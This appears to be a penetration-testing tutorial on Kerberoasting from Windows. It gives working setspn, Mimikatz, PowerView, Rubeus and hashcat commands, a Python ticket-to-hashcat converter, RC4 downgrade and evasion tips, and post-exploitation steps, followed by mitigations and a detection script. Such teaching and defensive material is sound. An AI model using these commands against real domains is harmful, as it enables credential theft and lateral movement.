Kerberoasting - from Windows
Kerberoasting targets accounts that have a Service Principal Name (SPN) set. Any authenticated domain user can request a Kerberos TGS (service) ticket for such an SPN; the ticket is encrypted with a key derived from the service account's password, so it can be taken offline and cracked by guessing that password. From Windows, this can be done semi-manually with built-in tools or automated with offensive tooling such as PowerView and Rubeus.
Semi-Manual Method
1. Enumerate SPNs with setspn.exe
setspn.exe -Q */*
Focus on user accounts (service accounts kept in OUs such as Service Accounts), not computer accounts: machine account passwords are long random strings that rotate automatically and are not realistically crackable. Look for accounts like BACKUPAGENT, sqlprod, sqldev, solarwindsmonitor, etc.
2. Request a TGS Ticket via PowerShell
Target a single SPN and load the ticket into memory:
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433"
What this does:
- Add-Type -AssemblyName System.IdentityModel loads the .NET assembly that contains the security token classes.
- New-Object ... KerberosRequestorSecurityToken creates a security token and requests a TGS ticket for the given SPN in the current logon session; the ticket is cached and can be seen with klist.
To request tickets for every SPN in the domain at once (noisy, and includes computer accounts whose tickets are not worth cracking):
setspn.exe -T INLANEFREIGHT.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }
3. Extract Tickets with Mimikatz
mimikatz # base64 /out:true
mimikatz # kerberos::list /export
With base64 /out:true the tickets are printed to the console as base64; omit it to write .kirbi files directly to disk instead.
4. Prepare and Crack the Hash
# Remove newlines from base64 blob
echo "<base64 blob>" | tr -d \\n
# Decode to .kirbi
cat encoded_file | base64 -d > sqldev.kirbi
# Extract hash with kirbi2john
python2.7 kirbi2john.py sqldev.kirbi
# Reformat for Hashcat (add etype 23 marker)
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat
# Crack with Hashcat (mode 13100 = RC4 TGS-REP)
hashcat -m 13100 sqldev_tgs_hashcat /usr/share/wordlists/rockyou.txt
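Steps 3 and 4 above hand the .kirbi to kirbi2john and a sed one-liner. The following Python 3 script is an added example (it is not part of the original page, nor the kirbi2john tool) that does the same conversion end to end: it accepts either raw .kirbi bytes or the line-wrapped base64 that mimikatz prints, walks the KRB-CRED DER structure to pull the realm, SPN, etype and ciphertext out of the embedded ticket, and emits the hashcat line for mode 13100 (RC4) or, going slightly beyond the page's RC4-only sed rule, 19600/19700 (AES). A ticket does not carry the requesting user's sAMAccountName, so that is passed in by hand. The sample ticket built for the self-test is constructed: realm, SPN, account name and cipher bytes are made up and do not come from a real domain.

```python
import base64
import sys

HASHCAT_MODE = {23: 13100, 17: 19600, 18: 19700}   # etype -> hashcat mode

# --- Minimal DER reader (Kerberos structures only use single-byte tags) ------

def der_read(buf, pos=0):
    """Read one TLV starting at pos; return (tag, content, position after it)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                                  # long-form length
        nbytes = length & 0x7F
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    return tag, buf[pos:pos + length], pos + length

def der_children(body):
    """Split the body of a constructed type into its (tag, content) members."""
    out, pos = [], 0
    while pos < len(body):
        tag, val, pos = der_read(body, pos)
        out.append((tag, val))
    return out

def der_ctx(seq_body, n):
    """Unwrapped content of the context-specific element [n] in a SEQUENCE body."""
    for tag, val in der_children(seq_body):
        if tag == (0xA0 | n):
            return der_read(val)[1]
    raise ValueError(f"missing [{n}] element")

# --- KRB-CRED (.kirbi) -> hashcat -------------------------------------------

def load_kirbi(blob):
    """Accept raw .kirbi bytes or the line-wrapped base64 that mimikatz prints."""
    if blob[:1] == b"\x76":                            # already DER: [APPLICATION 22]
        return blob
    return base64.b64decode(b"".join(blob.split()))    # strip newlines, then decode

def kirbi_to_hashcat(kirbi, user):
    """Return (hashcat_mode, hash_line) for each Ticket inside a KRB-CRED."""
    tag, body, _ = der_read(kirbi)
    if tag != 0x76:
        raise ValueError("not a KRB-CRED structure")
    cred = der_read(body)[1]                           # KRB-CRED SEQUENCE body
    lines = []
    for ttag, tbody in der_children(der_ctx(cred, 2)): # tickets [2] SEQUENCE OF Ticket
        if ttag != 0x61:                               # [APPLICATION 1] Ticket
            continue
        t = der_read(tbody)[1]
        realm = der_ctx(t, 1).decode()
        name_parts = der_children(der_ctx(der_ctx(t, 2), 1))   # sname [2] -> name-string [1]
        spn = "/".join(v.decode() for _, v in name_parts).replace(":", "~")  # ':' is hashcat's separator
        enc = der_ctx(t, 3)                            # enc-part [3] EncryptedData
        etype = int.from_bytes(der_ctx(enc, 0), "big", signed=True)
        cipher = der_ctx(enc, 2)
        if etype == 23:      # RC4-HMAC: 16-byte HMAC-MD5 checksum precedes the ciphertext
            line = f"$krb5tgs$23$*{user}${realm}${spn}*${cipher[:16].hex()}${cipher[16:].hex()}"
        elif etype in (17, 18):  # AES: 12-byte HMAC-SHA1-96 tag follows the ciphertext
            line = f"$krb5tgs${etype}${user}${realm}$*{spn}*${cipher[-12:].hex()}${cipher[:-12].hex()}"
        else:
            raise ValueError(f"unsupported etype {etype}")
        lines.append((HASHCAT_MODE[etype], line))
    return lines

# --- Constructed sample data for self-testing (not a real ticket) -----------

def _der(tag, content):
    n = len(content)
    if n < 0x80:
        return bytes([tag, n]) + content
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + content

def build_sample_kirbi(realm, spn, etype, cipher):
    """Build a minimal KRB-CRED carrying one Ticket with the given fields."""
    seq = lambda *items: _der(0x30, b"".join(items))
    ctx = lambda n, tlv: _der(0xA0 | n, tlv)
    app = lambda n, tlv: _der(0x60 | n, tlv)
    uint = lambda v: _der(0x02, bytes([v]))            # values < 128 only
    gstr = lambda s: _der(0x1B, s.encode())
    sname = seq(ctx(0, uint(2)), ctx(1, seq(*[gstr(p) for p in spn.split("/")])))
    enc = seq(ctx(0, uint(etype)), ctx(1, uint(2)), ctx(2, _der(0x04, cipher)))
    ticket = app(1, seq(ctx(0, uint(5)), ctx(1, gstr(realm)), ctx(2, sname), ctx(3, enc)))
    cred_enc = seq(ctx(0, uint(0)), ctx(2, _der(0x04, b"\x00" * 8)))  # dummy enc-part
    return app(22, seq(ctx(0, uint(5)), ctx(1, uint(22)), ctx(2, seq(ticket)), ctx(3, cred_enc)))

def wrap_base64(kirbi, width=64):
    """Emulate the wrapped base64 output of mimikatz' base64 /out:true."""
    text = base64.b64encode(kirbi).decode()
    return "\n".join(text[i:i + width] for i in range(0, len(text), width)).encode()

if __name__ == "__main__":
    with open(sys.argv[1], "rb") as f:
        for mode, line in kirbi_to_hashcat(load_kirbi(f.read()), sys.argv[2]):
            print(f"# hashcat -m {mode}\n{line}")
```

Usage: python3 kirbi2hashcat.py sqldev.kirbi sqldev (the script name is arbitrary); the first argument may also be the pasted base64 saved to a file, since the loader strips the line wrapping itself. The ':' to '~' substitution in the SPN matters: hashcat splits the line on ':' and a port such as :1433 would otherwise break parsing.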
Automated / Tool-Based Methods
PowerView
Import-Module .\PowerView.ps1
# Enumerate all SPN accounts
Get-DomainUser * -spn | select samaccountname
# Get TGS hash for a specific user in Hashcat format
Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat
# Export all SPN ticket hashes to CSV for offline cracking
Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\ilfreight_tgs.csv -NoTypeInformation
Rubeus
# Gather stats on Kerberoastable accounts (no tickets requested)
.\Rubeus.exe kerberoast /stats
# Kerberoast high-value targets (admincount=1), no line wrapping
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap
# Kerberoast a specific user
.\Rubeus.exe kerberoast /user:testspn /nowrap
# Force RC4 encryption even on AES-enabled accounts (pre-Server 2019 DCs only)
.\Rubeus.exe kerberoast /tgtdeleg /nowrap
# OPSEC-friendlier: use the tgtdeleg trick but skip accounts that have AES enabled (no etype downgrade, so no RC4-ticket-for-an-AES-account anomaly in the logs)
.\Rubeus.exe kerberoast /rc4opsec /nowrap
# Output hashes to a file
.\Rubeus.exe kerberoast /outfile:hashes.txt /nowrap
# Kerberoast with alternate credentials
.\Rubeus.exe kerberoast /creduser:DOMAIN.FQDN\USER /credpassword:PASSWORD /nowrap
# Filter by password age
.\Rubeus.exe kerberoast /pwdsetafter:01-31-2005 /pwdsetbefore:03-29-2010 /resultlimit:5 /nowrap
Always use /nowrap to get hashes on a single line for easy copy-paste into Hashcat.
Encryption Types & Cracking
| Encryption | Hash prefix | Hashcat mode | Relative cracking speed |
|---|---|---|---|
| RC4_HMAC (etype 23) | $krb5tgs$23$* | 13100 | Fast: a few cheap MD4/HMAC-MD5 operations per guess |
| AES128-CTS-HMAC-SHA1-96 (etype 17) | $krb5tgs$17$ | 19600 | Slow: the key is derived with 4096 rounds of PBKDF2-HMAC-SHA1 per guess |
| AES256-CTS-HMAC-SHA1-96 (etype 18) | $krb5tgs$18$ | 19700 | Slow: same derivation; expect rates orders of magnitude below RC4 |
Checking Encryption Support
Get-DomainUser testspn -Properties samaccountname,serviceprincipalname,msds-supportedencryptiontypes
| msDS-SupportedEncryptionTypes | Meaning |
|---|---|
| 0 / not set | Not defined; the DC falls back to RC4_HMAC_MD5 |
| 4 | RC4_HMAC only |
| 8 / 16 | AES128 only / AES256 only |
| 24 | AES128 + AES256 only (bits 8 and 16), no RC4 |
| 28 | RC4 + AES128 + AES256; a normal request still yields the strongest type, AES256 |
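To turn those attribute values into a decision before roasting, here is an added Python example (not code from the page) that decodes the msDS-SupportedEncryptionTypes bitmask, predicts which etype and Hashcat mode a normal TGS request for the account will produce, and says whether the /tgtdeleg RC4 downgrade described in the next section would apply. The dc_honours_downgrade switch mirrors the Server 2016-versus-2019 behaviour the page describes, and the account list it runs on is constructed to match the columns of the Get-DomainUser query above.

```python
# Bits of msDS-SupportedEncryptionTypes (MS-KILE 2.2.7)
DES_CBC_CRC, DES_CBC_MD5, RC4_HMAC, AES128, AES256 = 0x1, 0x2, 0x4, 0x8, 0x10
FLAG_NAMES = {DES_CBC_CRC: "DES_CBC_CRC", DES_CBC_MD5: "DES_CBC_MD5", RC4_HMAC: "RC4_HMAC",
              AES128: "AES128_CTS_HMAC_SHA1_96", AES256: "AES256_CTS_HMAC_SHA1_96"}
HASHCAT_MODE = {23: 13100, 17: 19600, 18: 19700}

def decode_etypes(value):
    """Names advertised by the attribute; 0 or unset means the DC falls back to RC4."""
    if not value:
        return ["RC4_HMAC (attribute unset, default)"]
    return [name for bit, name in FLAG_NAMES.items() if value & bit]

def expected_ticket(value, dc_honours_downgrade):
    """Predict the etype a TGS for this account carries and whether /tgtdeleg can force RC4.

    dc_honours_downgrade: True for Server 2016 and earlier DCs, False for Server 2019
    (the page's caveat: 2019 always uses the strongest etype the account supports)."""
    bits = value or RC4_HMAC
    if bits & AES256:
        etype = 18
    elif bits & AES128:
        etype = 17
    elif bits & RC4_HMAC:
        etype = 23
    else:
        raise ValueError("DES-only account: no Kerberoastable etype")
    return {
        "etype": etype,
        "hashcat_mode": HASHCAT_MODE[etype],
        "rc4_downgrade_possible": etype != 23 and dc_honours_downgrade,
    }

def triage(accounts, dc_honours_downgrade=True):
    """accounts: iterable of (sAMAccountName, msDS-SupportedEncryptionTypes) pairs."""
    report = {}
    for name, value in accounts:
        info = expected_ticket(value, dc_honours_downgrade)
        info["supported"] = decode_etypes(value)
        report[name] = info
    return report

# Constructed sample rows (names and values are made up, not from a real domain)
SAMPLE_ACCOUNTS = [("sqldev", 0), ("testspn", 24), ("backupagent", 28)]

if __name__ == "__main__":
    for dc in (True, False):
        print("DC honours RC4 downgrade:", dc)
        for name, info in triage(SAMPLE_ACCOUNTS, dc).items():
            print(f"  {name:12} etype {info['etype']} -m {info['hashcat_mode']} "
                  f"downgrade={info['rc4_downgrade_possible']} {info['supported']}")
```

The practical reading: an account with the attribute unset gives you an RC4 ticket without any tricks, an AES-only account is worth /tgtdeleg only if the DC is 2016 or older, and otherwise you should budget for mode 19600/19700 cracking times.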
Downgrade to RC4 with /tgtdeleg
The /tgtdeleg flag makes Rubeus obtain a copy of the current user's TGT (via the GSS-API/unconstrained delegation trick, no elevation needed) and then build the TGS-REQ itself, listing RC4 as the only supported encryption type in the request body. A DC that honours the request returns an RC4-encrypted ticket even for an account that supports AES.
Caveat: this does not work against Windows Server 2019 DCs, which return a ticket encrypted with the strongest type the target account supports regardless of what the request asks for. Against Server 2016 and earlier DCs the downgrade works.
Mitigation & Detection
Mitigations
| Control | Details |
|---|---|
| Managed Service Accounts (MSA/gMSA) | Auto-rotate complex passwords like machine accounts — preferred for all service accounts |
| LAPS | Rotates local Administrator passwords on domain-joined hosts only; useful hygiene, but it does not rotate domain service account passwords and so is not a substitute for gMSA here |
| Long complex passwords | For non-managed service accounts, use passphrases that don’t appear in wordlists |
| Restrict RC4 | Remove RC4 support where possible (test thoroughly — may break legacy systems) |
| No privileged SPN accounts | Domain Admins and high-privilege accounts should never be used as SPN accounts |
Detection
| Indicator | Details |
|---|---|
| Event ID 4769 | “A Kerberos service ticket was requested”. Look at ServiceName: many distinct user-account services (not krbtgt or computer accounts ending in $) requested by one account from one source IP in a short window indicate Kerberoasting |
| Event ID 4770 | “A Kerberos service ticket was renewed”. Low signal on its own; Kerberoasting shows up in 4769, not here |
| Encryption type 0x17 | RC4 ticket (TicketEncryptionType 0x17; 0x11/0x12 are AES128/AES256). An RC4 ticket for a service account that supports AES means the requester asked for a downgrade |
| Abnormal TGS-REQ volume | 10-20 TGS requests per account is normal; hundreds in rapid succession is not |
Enable logging via: Group Policy > Computer Configuration > Policies > Windows Settings > Security Settings > Advanced Audit Policy Configuration > Audit Policies > Account Logon > Audit Kerberos Service Ticket Operations (enable at least Success auditing on the domain controllers).
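As an added example (not from the page), the following Python sketch applies the indicators from the table to a handful of constructed 4769 records: it ignores tickets for krbtgt and computer accounts (names ending in $), flags RC4 (0x17) service tickets for user-account SPNs, and raises a burst alert when one requester pulls tickets for a threshold number of distinct user-account services inside a sliding five-minute window. Field names follow the 4769 event XML (TargetUserName, ServiceName, TicketEncryptionType, IpAddress); the window and threshold are assumptions to tune against your own baseline, and the sample events are made up.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

RC4_HMAC = 0x17          # TicketEncryptionType as logged in 4769 ("0x17")

def is_user_service(service_name):
    """Only tickets for user-account SPNs matter; krbtgt and computer accounts ($) are noise."""
    return service_name != "krbtgt" and not service_name.endswith("$")

def detect(events, window=timedelta(minutes=5), threshold=20):
    """Run the two indicators over 4769 records.

    events: dicts with keys time (datetime), TargetUserName, ServiceName,
            TicketEncryptionType (hex string as logged, e.g. "0x17"), IpAddress.
    Returns a list of alert dicts."""
    alerts = []
    recent = defaultdict(deque)      # requester -> (time, service) pairs inside the window
    burst_fired = set()
    for e in sorted(events, key=lambda ev: ev["time"]):
        svc = e["ServiceName"]
        if not is_user_service(svc):
            continue
        who = e["TargetUserName"]
        # Indicator 1: RC4 ticket for a user-account service where AES is the norm
        if int(e["TicketEncryptionType"], 16) == RC4_HMAC:
            alerts.append({"rule": "rc4_service_ticket", "account": who,
                           "service": svc, "ip": e["IpAddress"], "time": e["time"]})
        # Indicator 2: many distinct services requested by one account in a short window
        q = recent[who]
        q.append((e["time"], svc))
        while e["time"] - q[0][0] > window:      # the newest entry always stays, so this terminates
            q.popleft()
        distinct = {s for _, s in q}
        if len(distinct) >= threshold and who not in burst_fired:
            burst_fired.add(who)
            alerts.append({"rule": "tgs_burst", "account": who, "ip": e["IpAddress"],
                           "distinct_services": len(distinct), "time": e["time"]})
    return alerts

def sample_events():
    """Constructed 4769 records (not real log data)."""
    base = datetime(2024, 1, 15, 9, 0, 0)
    ev = []
    # jsmith pulls RC4 tickets for 25 different service accounts within 25 seconds
    for i in range(25):
        ev.append({"time": base + timedelta(seconds=i), "TargetUserName": "jsmith@INLANEFREIGHT.LOCAL",
                   "ServiceName": f"svc{i:02d}", "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.5"})
    # the same user's normal AES traffic: file servers (computer accounts) and krbtgt
    for i, svc in enumerate(["FS01$", "WS01$", "krbtgt"]):
        ev.append({"time": base + timedelta(seconds=30 + i), "TargetUserName": "jsmith@INLANEFREIGHT.LOCAL",
                   "ServiceName": svc, "TicketEncryptionType": "0x12", "IpAddress": "10.10.14.5"})
    # bob: three AES tickets for three services spread over an hour (normal)
    for i in range(3):
        ev.append({"time": base + timedelta(minutes=20 * i), "TargetUserName": "bob@INLANEFREIGHT.LOCAL",
                   "ServiceName": f"app{i}", "TicketEncryptionType": "0x12", "IpAddress": "10.10.14.9"})
    return ev

if __name__ == "__main__":
    for a in detect(sample_events()):
        print(a)
```

Note that the burst rule fires once per account when the distinct-service count first crosses the threshold, and that Rubeus /rc4opsec deliberately avoids the first indicator by skipping AES-enabled accounts, which is why the volume-based rule is the one to keep even where RC4 is still common.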
Post-Exploitation with Cracked Credentials
Once service account passwords are cracked, potential next steps:
- RDP or WinRM access as a local user/admin
- Remote admin via PsExec
- Access sensitive file shares
- MSSQL access as a DBA for privilege escalation
- Further domain enumeration for lateral movement